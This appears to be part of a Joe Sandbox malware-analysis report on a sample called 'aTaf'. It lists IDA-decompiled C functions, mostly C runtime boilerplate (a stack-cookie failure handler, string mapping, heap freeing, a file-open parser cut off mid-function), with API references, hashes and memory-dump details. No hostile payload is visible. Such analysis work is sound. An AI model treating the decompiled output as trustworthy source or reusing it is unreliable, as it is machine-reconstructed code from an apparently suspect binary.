                              Yara matches
                              Similarity
                              • API ID: ProcessTerminate
                              • String ID:
                              • API String ID: 560597551-0
                              • Opcode ID: 8d14ae05a9dad9c05cb957789c0d7b66081069df36a9c1cd08e0a696cbd40e96
                              • Instruction ID: 30d7a66bfda154b9128336625e3198fa971fb7c00ac6e6305f959e87c74458a5
                              • Opcode Fuzzy Hash: 8d14ae05a9dad9c05cb957789c0d7b66081069df36a9c1cd08e0a696cbd40e96
                              • Instruction Fuzzy Hash: 919002A034415112D920259C0C01B0500011791634F304710B131BA2D4D84096004115
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 85%
                              			E0040CE09(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                              				intOrPtr _v0;
                              				void* _v804;
                              				intOrPtr _v808;
                              				intOrPtr _v812;
                              				intOrPtr _t6;
                              				intOrPtr _t11;
                              				intOrPtr _t12;
                              				intOrPtr _t13;
                              				long _t17;
                              				intOrPtr _t21;
                              				intOrPtr _t22;
                              				intOrPtr _t25;
                              				intOrPtr _t26;
                              				intOrPtr _t27;
                              				intOrPtr* _t31;
                              				void* _t34;
                              
                              				_t27 = __esi;
                              				_t26 = __edi;
                              				_t25 = __edx;
                              				_t22 = __ecx;
                              				_t21 = __ebx;
                              				_t6 = __eax;
                              				_t34 = _t22 -  *0x422234; // 0x98705858
                              				if(_t34 == 0) {
                              					asm("repe ret");
                              				}
                              				 *0x423b98 = _t6;
                              				 *0x423b94 = _t22;
                              				 *0x423b90 = _t25;
                              				 *0x423b8c = _t21;
                              				 *0x423b88 = _t27;
                              				 *0x423b84 = _t26;
                              				 *0x423bb0 = ss;
                              				 *0x423ba4 = cs;
                              				 *0x423b80 = ds;
                              				 *0x423b7c = es;
                              				 *0x423b78 = fs;
                              				 *0x423b74 = gs;
                              				asm("pushfd");
                              				_pop( *0x423ba8);
                              				 *0x423b9c =  *_t31;
                              				 *0x423ba0 = _v0;
                              				 *0x423bac =  &_a4;
                              				 *0x423ae8 = 0x10001;
                              				_t11 =  *0x423ba0; // 0x0
                              				 *0x423a9c = _t11;
                              				 *0x423a90 = 0xc0000409;
                              				 *0x423a94 = 1;
                              				_t12 =  *0x422234; // 0x98705858
                              				_v812 = _t12;
                              				_t13 =  *0x422238; // 0x678fa7a7
                              				_v808 = _t13;
                              				 *0x423ae0 = IsDebuggerPresent();
                              				_push(1);
                              				E004138FC(_t14);
                              				SetUnhandledExceptionFilter(0);
                              				_t17 = UnhandledExceptionFilter(0x41fb80);
                              				if( *0x423ae0 == 0) {
                              					_push(1);
                              					E004138FC(_t17);
                              				}
                              				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                              			}




















                              APIs
                              • IsDebuggerPresent.KERNEL32 ref: 004136F4
                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                              • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                              • TerminateProcess.KERNEL32(00000000), ref: 00413737
                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                              • String ID:
                              • API String ID: 2579439406-0
                              • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                              • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                              • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                              • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • IsDebuggerPresent.KERNEL32 ref: 0051395B
                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00513970
                              • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 0051397B
                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00513997
                              • TerminateProcess.KERNEL32(00000000), ref: 0051399E
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                              • String ID:
                              • API String ID: 2579439406-0
                              • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                              • Instruction ID: 8bb64b6ef3fe0333a43da50481b806d2affb3b2ae0a9368f720a95498eb29b51
                              • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                              • Instruction Fuzzy Hash: 9421D2B9A01204EFD720DF64E95A6857FB0FB08356F804079E50D87662E7B86A82CF5D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0040ADB0(intOrPtr* __ecx) {
                              				void* _t5;
                              				intOrPtr* _t11;
                              
                              				_t11 = __ecx;
                              				_t5 =  *(__ecx + 8);
                              				 *__ecx = 0x41eff0;
                              				if(_t5 != 0) {
                              					_t5 =  *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))(_t5);
                              				}
                              				if( *(_t11 + 0xc) != 0) {
                              					_t5 = GetProcessHeap();
                              					if(_t5 != 0) {
                              						return HeapFree(_t5, 0,  *(_t11 + 0xc));
                              					}
                              				}
                              				return _t5;
                              			}






                              APIs
                              • GetProcessHeap.KERNEL32 ref: 0040ADD0
                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$FreeProcess
                              • String ID:
                              • API String ID: 3859560861-0
                              • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                              • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                              • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                              • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ae75fc8c093f7e9f6b878a788f5ef27d36d5e75305522888a43586f13dd1e25d
                              • Instruction ID: 48fd7b9dfdaf466b32f6cb94f21b0f23b5ef15627c34572eaf222eb5b342a239
                              • Opcode Fuzzy Hash: ae75fc8c093f7e9f6b878a788f5ef27d36d5e75305522888a43586f13dd1e25d
                              • Instruction Fuzzy Hash: AC217F2544E7D48FC313AB7498660817FB16E53120B1E89DBC4C68F4B3DA68594DDB73
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                              • Instruction ID: cb338683bbbbb770a5ec9f26ce2a43e2f4ac44bafd8af397dcfe8ba9a35ecf79
                              • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                              • Instruction Fuzzy Hash: B401A277A006048FDF21DF64C805BAF37E9FB86316F4544A5D90AA72C2E774A9818B90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 86%
                              			E00417081(short* __ecx, int _a4, signed int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
                              				signed int _v8;
                              				int _v12;
                              				int _v16;
                              				int _v20;
                              				intOrPtr _v24;
                              				void* _v36;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				signed int _t110;
                              				intOrPtr _t112;
                              				intOrPtr _t113;
                              				short* _t115;
                              				short* _t116;
                              				char* _t120;
                              				short* _t121;
                              				short* _t123;
                              				short* _t127;
                              				int _t128;
                              				short* _t141;
                              				signed int _t144;
                              				void* _t146;
                              				short* _t147;
                              				signed int _t150;
                              				short* _t153;
                              				char* _t157;
                              				int _t160;
                              				long _t162;
                              				signed int _t174;
                              				signed int _t178;
                              				signed int _t179;
                              				int _t182;
                              				short* _t184;
                              				signed int _t186;
                              				signed int _t188;
                              				short* _t189;
                              				int _t191;
                              				intOrPtr _t194;
                              				int _t207;
                              
                              				_t110 =  *0x422234; // 0x98705858
                              				_v8 = _t110 ^ _t188;
                              				_t184 = __ecx;
                              				_t194 =  *0x423e7c; // 0x1
                              				if(_t194 == 0) {
                              					_t182 = 1;
                              					if(LCMapStringW(0, 0x100, 0x420398, 1, 0, 0) == 0) {
                              						_t162 = GetLastError();
                              						__eflags = _t162 - 0x78;
                              						if(_t162 == 0x78) {
                              							 *0x423e7c = 2;
                              						}
                              					} else {
                              						 *0x423e7c = 1;
                              					}
                              				}
                              				if(_a16 <= 0) {
                              					L13:
                              					_t112 =  *0x423e7c; // 0x1
                              					if(_t112 == 2 || _t112 == 0) {
                              						_v16 = 0;
                              						_v20 = 0;
                              						__eflags = _a4;
                              						if(_a4 == 0) {
                              							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
                              						}
                              						__eflags = _a28;
                              						if(_a28 == 0) {
                              							_a28 =  *((intOrPtr*)( *_t184 + 4));
                              						}
                              						_t113 = E00417A20(0, _t179, _t182, _t184, _a4);
                              						_v24 = _t113;
                              						__eflags = _t113 - 0xffffffff;
                              						if(_t113 != 0xffffffff) {
                              							__eflags = _t113 - _a28;
                              							if(_t113 == _a28) {
                              								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
                              								L78:
                              								__eflags = _v16;
                              								if(__eflags != 0) {
                              									_push(_v16);
                              									E0040B6B5(0, _t182, _t184, __eflags);
                              								}
                              								_t115 = _v20;
                              								__eflags = _t115;
                              								if(_t115 != 0) {
                              									__eflags = _a20 - _t115;
                              									if(__eflags != 0) {
                              										_push(_t115);
                              										E0040B6B5(0, _t182, _t184, __eflags);
                              									}
                              								}
                              								_t116 = _t184;
                              								goto L84;
                              							}
                              							_t120 = E00417A69(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
                              							_t191 =  &(_t189[0xc]);
                              							_v16 = _t120;
                              							__eflags = _t120;
                              							if(_t120 == 0) {
                              								goto L58;
                              							}
                              							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
                              							_v12 = _t121;
                              							__eflags = _t121;
                              							if(__eflags != 0) {
                              								if(__eflags <= 0) {
                              									L71:
                              									_t182 = 0;
                              									__eflags = 0;
                              									L72:
                              									__eflags = _t182;
                              									if(_t182 == 0) {
                              										goto L62;
                              									}
                              									E0040BA30(_t182, _t182, 0, _v12);
                              									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
                              									_v12 = _t123;
                              									__eflags = _t123;
                              									if(_t123 != 0) {
                              										_t186 = E00417A69(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
                              										_v20 = _t186;
                              										asm("sbb esi, esi");
                              										_t184 =  ~_t186 & _v12;
                              										__eflags = _t184;
                              									} else {
                              										_t184 = 0;
                              									}
                              									E004147AE(_t182);
                              									goto L78;
                              								}
                              								__eflags = _t121 - 0xffffffe0;
                              								if(_t121 > 0xffffffe0) {
                              									goto L71;
                              								}
                              								_t127 =  &(_t121[4]);
                              								__eflags = _t127 - 0x400;
                              								if(_t127 > 0x400) {
                              									_t128 = E0040B84D(0, _t179, _t182, _t127);
                              									__eflags = _t128;
                              									if(_t128 != 0) {
                              										 *_t128 = 0xdddd;
                              										_t128 = _t128 + 8;
                              										__eflags = _t128;
                              									}
                              									_t182 = _t128;
                              									goto L72;
                              								}
                              								E0040CFB0(_t127);
                              								_t182 = _t191;
                              								__eflags = _t182;
                              								if(_t182 == 0) {
                              									goto L62;
                              								}
                              								 *_t182 = 0xcccc;
                              								_t182 = _t182 + 8;
                              								goto L72;
                              							}
                              							L62:
                              							_t184 = 0;
                              							goto L78;
                              						} else {
                              							goto L58;
                              						}
                              					} else {
                              						if(_t112 != 1) {
                              							L58:
                              							_t116 = 0;
                              							L84:
                              							return E0040CE09(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
                              						}
                              						_v12 = 0;
                              						if(_a28 == 0) {
                              							_a28 =  *((intOrPtr*)( *_t184 + 4));
                              						}
                              						_t184 = MultiByteToWideChar;
                              						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
                              						_t207 = _t182;
                              						if(_t207 == 0) {
                              							goto L58;
                              						} else {
                              							if(_t207 <= 0) {
                              								L28:
                              								_v16 = 0;
                              								L29:
                              								if(_v16 == 0) {
                              									goto L58;
                              								}
                              								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
                              									L52:
                              									E004147AE(_v16);
                              									_t116 = _v12;
                              									goto L84;
                              								}
                              								_t184 = LCMapStringW;
                              								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
                              								_v12 = _t174;
                              								if(_t174 == 0) {
                              									goto L52;
                              								}
                              								if((_a8 & 0x00000400) == 0) {
                              									__eflags = _t174;
                              									if(_t174 <= 0) {
                              										L44:
                              										_t184 = 0;
                              										__eflags = 0;
                              										L45:
                              										__eflags = _t184;
                              										if(_t184 != 0) {
                              											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
                              											__eflags = _t141;
                              											if(_t141 != 0) {
                              												_push(0);
                              												_push(0);
                              												__eflags = _a24;
                              												if(_a24 != 0) {
                              													_push(_a24);
                              													_push(_a20);
                              												} else {
                              													_push(0);
                              													_push(0);
                              												}
                              												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
                              											}
                              											E004147AE(_t184);
                              										}
                              										goto L52;
                              									}
                              									_t144 = 0xffffffe0;
                              									_t179 = _t144 % _t174;
                              									__eflags = _t144 / _t174 - 2;
                              									if(_t144 / _t174 < 2) {
                              										goto L44;
                              									}
                              									_t52 = _t174 + 8; // 0x8
                              									_t146 = _t174 + _t52;
                              									__eflags = _t146 - 0x400;
                              									if(_t146 > 0x400) {
                              										_t147 = E0040B84D(0, _t179, _t182, _t146);
                              										__eflags = _t147;
                              										if(_t147 != 0) {
                              											 *_t147 = 0xdddd;
                              											_t147 =  &(_t147[4]);
                              											__eflags = _t147;
                              										}
                              										_t184 = _t147;
                              										goto L45;
                              									}
                              									E0040CFB0(_t146);
                              									_t184 = _t189;
                              									__eflags = _t184;
                              									if(_t184 == 0) {
                              										goto L52;
                              									}
                              									 *_t184 = 0xcccc;
                              									_t184 =  &(_t184[4]);
                              									goto L45;
                              								}
                              								if(_a24 != 0 && _t174 <= _a24) {
                              									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
                              								}
                              								goto L52;
                              							}
                              							_t150 = 0xffffffe0;
                              							_t179 = _t150 % _t182;
                              							if(_t150 / _t182 < 2) {
                              								goto L28;
                              							}
                              							_t25 = _t182 + 8; // 0x8
                              							_t152 = _t182 + _t25;
                              							if(_t182 + _t25 > 0x400) {
                              								_t153 = E0040B84D(0, _t179, _t182, _t152);
                              								__eflags = _t153;
                              								if(_t153 == 0) {
                              									L27:
                              									_v16 = _t153;
                              									goto L29;
                              								}
                              								 *_t153 = 0xdddd;
                              								L26:
                              								_t153 =  &(_t153[4]);
                              								goto L27;
                              							}
                              							E0040CFB0(_t152);
                              							_t153 = _t189;
                              							if(_t153 == 0) {
                              								goto L27;
                              							}
                              							 *_t153 = 0xcccc;
                              							goto L26;
                              						}
                              					}
                              				}
                              				_t178 = _a16;
                              				_t157 = _a12;
                              				while(1) {
                              					_t178 = _t178 - 1;
                              					if( *_t157 == 0) {
                              						break;
                              					}
                              					_t157 =  &(_t157[1]);
                              					if(_t178 != 0) {
                              						continue;
                              					}
                              					_t178 = _t178 | 0xffffffff;
                              					break;
                              				}
                              				_t160 = _a16 - _t178 - 1;
                              				if(_t160 < _a16) {
                              					_t160 = _t160 + 1;
                              				}
                              				_a16 = _t160;
                              				goto L13;
                              			}











































                              0x0041717b
                              0x0041717f
                              0x00000000
                              0x00000000
                              0x00417181
                              0x00000000
                              0x00417181
                              0x00417157
                              0x00417109
                              0x004170df
                              0x004170e2
                              0x004170e5
                              0x004170e5
                              0x004170e8
                              0x00000000
                              0x00000000
                              0x004170ea
                              0x004170ed
                              0x00000000
                              0x00000000
                              0x004170ef
                              0x00000000
                              0x004170ef
                              0x004170f7
                              0x004170fb
                              0x004170fd
                              0x004170fd
                              0x004170fe
                              0x00000000

                              APIs
                              • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                              • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,01FD18A8), ref: 004170C5
                              • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                              • _malloc.LIBCMT ref: 0041718A
                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                              • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                              • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                              • _malloc.LIBCMT ref: 0041724C
                              • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                              • __freea.LIBCMT ref: 004172A4
                              • __freea.LIBCMT ref: 004172AD
                              • ___ansicp.LIBCMT ref: 004172DE
                              • ___convertcp.LIBCMT ref: 00417309
                              • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                              • _malloc.LIBCMT ref: 00417362
                              • _memset.LIBCMT ref: 00417384
                              • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                              • ___convertcp.LIBCMT ref: 004173BA
                              • __freea.LIBCMT ref: 004173CF
                              • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                              • String ID:
                              • API String ID: 3809854901-0
                              • Opcode ID: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                              • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                              • Opcode Fuzzy Hash: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                              • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 0051731A
                              • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,00423620), ref: 0051732C
                              • _malloc.LIBCMT ref: 005173F1
                              • _malloc.LIBCMT ref: 005174B3
                              • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 005174DE
                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 00517501
                              • __freea.LIBCMT ref: 0051750B
                              • __freea.LIBCMT ref: 00517514
                              • ___ansicp.LIBCMT ref: 00517545
                              • ___convertcp.LIBCMT ref: 00517570
                              • _malloc.LIBCMT ref: 005175C9
                              • _memset.LIBCMT ref: 005175EB
                              • ___convertcp.LIBCMT ref: 00517621
                              • __freea.LIBCMT ref: 00517636
                              • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00517650
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: String__freea_malloc$___convertcp$ByteCharErrorLastMultiWide___ansicp_memset
                              • String ID:
                              • API String ID: 2918745354-0
                              • Opcode ID: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                              • Instruction ID: f0cd8df5f755df380bdf57c596c2208189620f28e4eb0385d4c6f61c169ed092
                              • Opcode Fuzzy Hash: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                              • Instruction Fuzzy Hash: 82B19B7290411EAFEF219FA8CC848EE7FB6FB4C354F158869F915A6160D7318D90DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00421320,0000000C,00510977,00000000,00000000,?,00000001,0050C22D,0050B993), ref: 0051084E
                              • __crt_waiting_on_module_handle.LIBCMT ref: 00510859
                                • Part of subcall function 0050E9D1: Sleep.KERNEL32(000003E8,00000000,?,0051079F,KERNEL32.DLL,?,005107EB,?,00000001,0050C22D,0050B993), ref: 0050E9DD
                                • Part of subcall function 0050E9D1: GetModuleHandleW.KERNEL32(00000001,?,0051079F,KERNEL32.DLL,?,005107EB,?,00000001,0050C22D,0050B993), ref: 0050E9E6
                              • __lock.LIBCMT ref: 005108B4
                              • InterlockedIncrement.KERNEL32(?), ref: 005108C1
                              • __lock.LIBCMT ref: 005108D5
                              • ___addlocaleref.LIBCMT ref: 005108F3
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: HandleModule__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                              • String ID: @.B$KERNEL32.DLL
                              • API String ID: 4021795732-2520587274
                              • Opcode ID: 6494f875005ce20cdce955d8c22516ac3ccd9d7187ee8c814306de8b46833c7d
                              • Instruction ID: c5c78f86d83f09b354ebb78029e9123bf684ce9cab3b9b7ebcad494213115049
                              • Opcode Fuzzy Hash: 6494f875005ce20cdce955d8c22516ac3ccd9d7187ee8c814306de8b46833c7d
                              • Instruction Fuzzy Hash: 9C117871944701AEE720AF75D805B9EBFF0BF44310F50492EE459972E2CBB499858F58
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 83%
                              			E004057B0(intOrPtr* __eax) {
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				intOrPtr* _t57;
                              				char* _t60;
                              				char _t62;
                              				intOrPtr _t63;
                              				char _t64;
                              				intOrPtr _t65;
                              				intOrPtr _t66;
                              				intOrPtr _t67;
                              				intOrPtr _t69;
                              				intOrPtr _t70;
                              				intOrPtr _t74;
                              				intOrPtr _t79;
                              				intOrPtr _t82;
                              				intOrPtr* _t83;
                              				void* _t86;
                              				char* _t88;
                              				char* _t89;
                              				intOrPtr* _t91;
                              				intOrPtr* _t93;
                              				signed int _t97;
                              				signed int _t98;
                              				void* _t100;
                              				void* _t101;
                              				void* _t102;
                              				void* _t103;
                              				void* _t104;
                              
                              				_t98 = _t97 | 0xffffffff;
                              				 *((intOrPtr*)(_t100 + 0xc)) = 0;
                              				_t91 = __eax;
                              				 *((intOrPtr*)(_t100 + 0x10)) = _t100 + 0x10;
                              				if( *((intOrPtr*)(_t100 + 0x68)) == 0 || __eax == 0) {
                              					__eflags = 0;
                              					return 0;
                              				} else {
                              					_t93 = E0040B84D(0, _t86, __eax, 0x74);
                              					_t101 = _t100 + 4;
                              					if(_t93 == 0) {
                              						L31:
                              						return 0;
                              					} else {
                              						 *((intOrPtr*)(_t93 + 0x20)) = 0;
                              						 *((intOrPtr*)(_t93 + 0x24)) = 0;
                              						 *((intOrPtr*)(_t93 + 0x28)) = 0;
                              						 *((intOrPtr*)(_t93 + 0x44)) = 0;
                              						 *_t93 = 0;
                              						 *((intOrPtr*)(_t93 + 0x48)) = 0;
                              						 *((intOrPtr*)(_t93 + 0xc)) = 0;
                              						 *((intOrPtr*)(_t93 + 0x10)) = 0;
                              						 *((intOrPtr*)(_t93 + 4)) = 0;
                              						 *((intOrPtr*)(_t93 + 0x40)) = 0;
                              						 *((intOrPtr*)(_t93 + 0x38)) = 0;
                              						 *((intOrPtr*)(_t93 + 0x3c)) = 0;
                              						 *((intOrPtr*)(_t93 + 0x64)) = 0;
                              						 *((intOrPtr*)(_t93 + 0x68)) = 0;
                              						 *(_t93 + 0x6c) = _t98;
                              						 *((intOrPtr*)(_t93 + 0x4c)) = E00403080(0, 0, 0);
                              						_t57 =  *((intOrPtr*)(_t101 + 0x78));
                              						_t102 = _t101 + 0xc;
                              						 *((intOrPtr*)(_t93 + 0x50)) = 0;
                              						 *((intOrPtr*)(_t93 + 0x58)) = 0;
                              						_t87 = _t57 + 1;
                              						do {
                              							_t82 =  *_t57;
                              							_t57 = _t57 + 1;
                              						} while (_t82 != 0);
                              						_t60 = E0040B84D(0, _t87, _t91, _t57 - _t87 + 1);
                              						_t103 = _t102 + 4;
                              						 *((intOrPtr*)(_t93 + 0x54)) = _t60;
                              						if(_t60 == 0) {
                              							L30:
                              							E00405160(0, _t87, _t93);
                              							goto L31;
                              						} else {
                              							_t83 =  *((intOrPtr*)(_t103 + 0x6c));
                              							_t88 = _t60;
                              							goto L7;
                              							L9:
                              							L9:
                              							if( *_t91 == 0x72) {
                              								 *((char*)(_t93 + 0x5c)) = 0x72;
                              							}
                              							_t63 =  *_t91;
                              							if(_t63 == 0x77 || _t63 == 0x61) {
                              								 *((char*)(_t93 + 0x5c)) = 0x77;
                              							}
                              							_t64 =  *_t91;
                              							if(_t64 < 0x30 || _t64 > 0x39) {
                              								__eflags = _t64 - 0x66;
                              								if(_t64 != 0x66) {
                              									__eflags = _t64 - 0x68;
                              									if(_t64 != 0x68) {
                              										__eflags = _t64 - 0x52;
                              										if(_t64 != 0x52) {
                              											_t89 =  *((intOrPtr*)(_t103 + 0x14));
                              											 *_t89 = _t64;
                              											_t87 = _t89 + 1;
                              											__eflags = _t87;
                              											 *((intOrPtr*)(_t103 + 0x14)) = _t87;
                              										} else {
                              											 *((intOrPtr*)(_t103 + 0x10)) = 3;
                              										}
                              									} else {
                              										 *((intOrPtr*)(_t103 + 0x10)) = 2;
                              									}
                              								} else {
                              									 *((intOrPtr*)(_t103 + 0x10)) = 1;
                              								}
                              							} else {
                              								_t98 = _t64 - 0x30;
                              							}
